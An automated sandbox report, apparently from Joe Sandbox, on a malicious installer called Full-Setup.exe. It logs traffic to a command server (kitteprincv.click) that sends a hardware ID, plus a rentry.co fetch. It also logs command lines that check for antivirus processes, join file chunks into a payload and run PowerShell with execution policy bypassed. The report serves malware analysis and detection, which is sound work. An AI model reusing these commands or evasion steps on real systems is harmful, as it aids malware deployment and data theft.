2024-12-21 12:02:21 UTC	15331	OUT	Data Raw: d9 d7 da 2c 0c 16 d9 08 2b 30 f0 10 5f 92 9d 4d d3 c1 91 4d 62 fb ff ff 13 13 ce 00 4e db d1 0f c8 e2 ce a1 76 19 a2 3a f4 23 7f bc f3 dd ba ac 2d 3f 51 6d 4e d0 14 00 12 58 a9 54 f7 3c 35 c2 82 9e 9e 11 fa e8 dd 06 fd a1 13 03 be e9 4f 5a bb 3f 3f cc 37 13 e4 dd 9a b7 ff 64 44 fd df 2d 31 41 10 e2 b3 b8 88 06 da f8 2b 38 f0 16 5d 28 80 1a 26 93 25 ff 09 4e d3 f6 49 dc 3c 56 63 69 cc ef ab 83 60 c0 80 13 e4 1c 59 6a 2f 8a 1e e0 50 a8 34 cc 95 3c dc 2f 35 e2 1a 8f 1d 51 a5 0b 60 b4 59 9e d1 d4 60 80 5f 7f cc 1a 5b 01 7c 2a e6 83 c7 45 de 6c c5 ed 9b b6 42 f3 da f9 f0 99 39 53 35 27 4e 6d 3e ab 48 35 e6 15 1c 13 bf 07 c1 46 dd fa eb 57 1c 24 50 d7 13 26 20 70 83 80 6b c0 d5 2b 47 85 ec a6 f2 03 08 07 ad 10 f7 86 ee e4 da b5 e6 cc 92 5d 6c 4c 9d 46 b0 97 2d Data Ascii: ,+0_MMbNv:#-?QmNXT<5OZ??7dD-1A+8](&%NI<Vci`Yj/P4</5Q`Y`_[\|*ElB9S5'Nm>H5FW$P& pk+G]lLF-
2024-12-21 12:02:21 UTC	15331	OUT	Data Raw: b7 c3 c9 8d 28 b9 d4 14 6f 11 8d 78 0b 8b 67 5a 0a 57 92 45 48 bb d6 6f 1a 69 af 39 a8 67 f2 45 3a 8f 9c 8c a0 bf bc 29 39 61 6a f9 29 9a 7f 83 cf 87 80 ae bd 8e 26 9c e1 bf 26 29 e8 38 af 4f 13 f8 6a ff 7f 2f bd b1 8e d3 3b 99 09 f1 31 89 65 3b 0d 79 99 77 d5 bc 04 11 6f cc a2 c7 1a 13 01 c3 ee 28 c8 3f 3c a3 02 e5 ff 32 63 ba 3b 0c 5f bc fa 45 b4 72 e7 cd 62 b6 06 02 22 bf b8 a6 9e f6 66 5d cd 0f 67 24 e4 2f d5 4c b8 4c c1 13 b5 4d a4 0a b4 ba 80 65 eb 8e d0 a3 30 0c 53 83 62 d4 0a 4d 71 de ee d7 97 8b 54 52 26 00 ec e4 e8 1d e7 6f 0c f9 ce 0e f4 f4 90 3e e0 3a 7f 60 b4 26 bc e7 b6 80 63 d0 c2 ab 79 7b 15 62 0b 3d cb 63 b0 52 6e b0 e4 ae 4b be d8 c2 40 98 54 a4 77 b3 72 c7 d8 52 b1 36 3d 8a 5a 37 eb 91 17 82 70 2f 60 ec cf f5 b1 57 84 41 88 f7 dc ac 3c Data Ascii: (oxgZWEHoi9gE:)9aj)&&)8Oj/;1e;ywo(?<2c;_Erb"f]g$/LLMe0SbMqTR&o>:`&cy{b=cRnK@TwrR6=Z7p/`WA<
2024-12-21 12:02:23 UTC	1139	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:02:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=qspd3ldt2jp0d531r2jpde8utc; expires=Wed, 16 Apr 2025 05:49:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nmyrYPf93x3iwWCXa8OnMjLkZ5BVelDKEU2jnntEz85HCzN14Kg5LY277MzxZkx0qUdyymmAYARLpX5NNTnq8g6Wx%2F%2FoJUO%2B9MJ6X2MRlwcD3w43vg2bxUCjl3sD8%2BQqAmkPXQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57b90649d0421c-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2325&min_rtt=2321&rtt_var=879&sent=338&recv=578&lost=0&retrans=0&sent_bytes=2843&recv_bytes=556020&delivery_rate=1239915&cwnd=252&unsent_bytes=0&cid=dc76fb0cdafa884c&ts=2245&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49767	104.21.43.127	443	7576	C:\Users\user\AppData\Local\Temp\600044\Glow.com

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:02:25 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 85 Host: kitteprincv.click
2024-12-21 12:02:25 UTC	85	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4d 65 48 64 79 34 2d 2d 70 6c 33 63 6c 65 61 72 26 6a 3d 26 68 77 69 64 3d 37 42 31 42 36 32 38 39 31 43 43 39 39 42 41 31 31 31 34 35 32 33 37 37 39 38 44 46 38 43 43 32 Data Ascii: act=get_message&ver=4.0&lid=MeHdy4--pl3clear&j=&hwid=7B1B62891CC99BA11145237798DF8CC2
2024-12-21 12:02:25 UTC	1133	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:02:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=h9cp0m5i2os5seq825i771faaq; expires=Wed, 16 Apr 2025 05:49:04 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7OipYskbIo%2F9H1e4k0TRnZbg3LC%2FKJNlsK0D9gA8SV2IGhmEGDZr1nPE%2FdoNxZWMPKrsjnzTgj1fonwb%2FajWyLEOiVITyMnn%2BrXRz4OAblF7ZHUl4ppl9flzAgYAvOEfr3RCcw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57b91ccd7a4368-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2447&min_rtt=2443&rtt_var=924&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=986&delivery_rate=1178845&cwnd=233&unsent_bytes=0&cid=1b069637747855c1&ts=793&x=0"
2024-12-21 12:02:25 UTC	126	IN	Data Raw: 37 38 0d 0a 32 51 4f 41 5a 37 58 4c 64 47 51 39 79 6d 31 66 30 62 79 72 76 6f 4f 6b 6c 55 75 6f 41 74 37 51 44 65 43 34 72 66 77 73 64 35 47 43 65 4b 49 53 6c 2f 46 57 44 45 6d 2b 48 53 7a 72 34 49 54 69 72 4e 62 77 4a 64 78 77 70 2f 35 75 6a 2b 53 43 6d 6b 6b 59 35 4c 78 30 35 56 4c 70 35 41 59 46 53 75 68 42 66 62 66 49 69 59 53 78 69 4c 63 75 69 6a 6a 75 72 56 41 3d 0d 0a Data Ascii: 782QOAZ7XLdGQ9ym1f0byrvoOklUuoAt7QDeC4rfwsd5GCeKISl/FWDEm+HSzr4ITirNbwJdxwp/5uj+SCmkkY5Lx05VLp5AYFSuhBfbfIiYSxiLcuijjurVA=
2024-12-21 12:02:25 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49773	104.26.3.16	443	7576	C:\Users\user\AppData\Local\Temp\600044\Glow.com

Timestamp	Bytes transferred	Direction	Data
2024-12-21 12:02:27 UTC	196	OUT	GET /feouewe5/raw HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: rentry.co
2024-12-21 12:02:27 UTC	935	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 12:02:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Origin vary: accept-encoding x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lF7ZbxlKMI9PXo%2Fka7CBdGlMNM8uqDGcsstJnE5Y4z1nuPkw1gVI9BRuxn11nwhXQ0C9bq8NoNzTwO3Xbjs7BocxSmAAiTCcjXsdtLkPkXndF1D5OiDB50svHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57b92a099e4213-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1577&rtt_var=603&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=810&delivery_rate=1799137&cwnd=229&unsent_bytes=0&cid=7bfba3defb2c3fad&ts=578&x=0"
2024-12-21 12:02:27 UTC	434	IN	Data Raw: 31 36 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 57 68 61 74 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 77 68 61 74 22 20 2f 3e 0a 0a 20 20 20 20 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 69 73 20 61 20 6d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 Data Ascii: 161b<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>What</title><link rel="canonical" href="https://rentry.co/what" /> <meta name="description" content="Rentry.co is a markdown paste service with preview, custom urls and e
2024-12-21 12:02:27 UTC	1369	IN	Data Raw: 74 3d 22 73 75 6d 6d 61 72 79 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e Data Ascii: t="summary" /><meta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." /><meta name="twitter:title" content="Rentry.co - Markdown Paste Service" /><meta name="twitter:site" content="@rentry_co" /><meta n
2024-12-21 12:02:27 UTC	1369	IN	Data Raw: 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 3d 20 6e 75 6c 6c 20 26 26 20 77 69 6e 64 6f 77 2e 6d 61 74 63 68 4d 65 64 69 61 28 22 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 20 64 61 72 6b 29 22 29 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 Data Ascii: localStorage.getItem("dark-mode") === null && window.matchMedia("(prefers-color-scheme: dark)").matches \|\| localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.h
2024-12-21 12:02:27 UTC	1369	IN	Data Raw: 20 6d 61 79 20 61 6c 73 6f 20 75 73 65 20 74 68 69 73 20 61 63 63 65 73 73 20 63 6f 64 65 20 61 73 20 61 20 68 65 61 64 65 72 20 69 6e 20 79 6f 75 72 20 72 65 71 75 65 73 74 2c 20 77 68 69 63 68 20 77 69 6c 6c 20 67 69 76 65 20 79 6f 75 20 61 63 63 65 73 73 20 74 6f 20 61 6e 79 20 70 6f 73 74 27 73 20 2f 72 61 77 2f 20 70 61 67 65 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 54 68 69 73 20 73 79 73 74 65 6d 20 77 61 73 20 61 20 6e 65 63 65 73 73 61 72 79 20 61 64 64 69 74 69 6f 6e 20 64 75 65 20 74 6f 20 65 78 74 65 6e 73 69 76 65 20 6d 69 73 75 73 65 20 62 79 20 62 61 64 20 61 63 74 6f 72 73 20 70 6f 73 74 69 6e 67 20 6d 61 6c 77 61 72 65 20 73 6e 69 70 70 65 74 73 20 61 6e 64 20 67 65 74 74 69 6e 67 20 75 73 20 Data Ascii: may also use this access code as a header in your request, which will give you access to any post's /raw/ page.</p> <p>This system was a necessary addition due to extensive misuse by bad actors posting malware snippets and getting us
2024-12-21 12:02:27 UTC	1126	IN	Data Raw: 63 6f 64 65 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 Data Ascii: code.min.js"></script><script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script> </div><script>(function(){function c(){var b=a.contentDocument\|\|a.contentWindow.document;if(
2024-12-21 12:02:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	07:01:17
Start date:	21/12/2024
Path:	C:\Users\user\Desktop\Full-Setup.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Full-Setup.exe"
Imagebase:	0x400000
File size:	1'286'284 bytes
MD5 hash:	8F260F06588B4B171CAA42F66929D9A6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	07:01:18
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Spare Spare.cmd && Spare.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	07:01:18
Start date:	21/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	07:01:19
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xe0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	07:01:19
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "opssvc wrsa"
Imagebase:	0x1a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:01:20
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xe0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	07:01:20
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x1a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	07:01:20
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 600044
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	07:01:20
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "Mary" Exploring
Imagebase:	0x1a0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	07:01:20
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Cancel + ..\Mag + ..\Investment + ..\Pee + ..\Condition + ..\Shopzilla + ..\Mention k
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	07:01:20
Start date:	21/12/2024
Path:	C:\Users\user\AppData\Local\Temp\600044\Glow.com
Wow64 process (32bit):	true
Commandline:	Glow.com k
Imagebase:	0x380000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	07:01:20
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xa30000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	07:02:26
Start date:	21/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\4VQOL9Z4BW428506NY343FUN.ps1"
Imagebase:	0x330000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	07:02:26
Start date:	21/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	26

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427773,74DF23A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

{, xrefs: 0040537E
New install of "%s" to "%s", xrefs: 004051AE

Memory Dump Source

Source File: 00000000.00000002.1805525423.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1805503772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805550479.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805570909.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1805683696.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Full-Setup.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
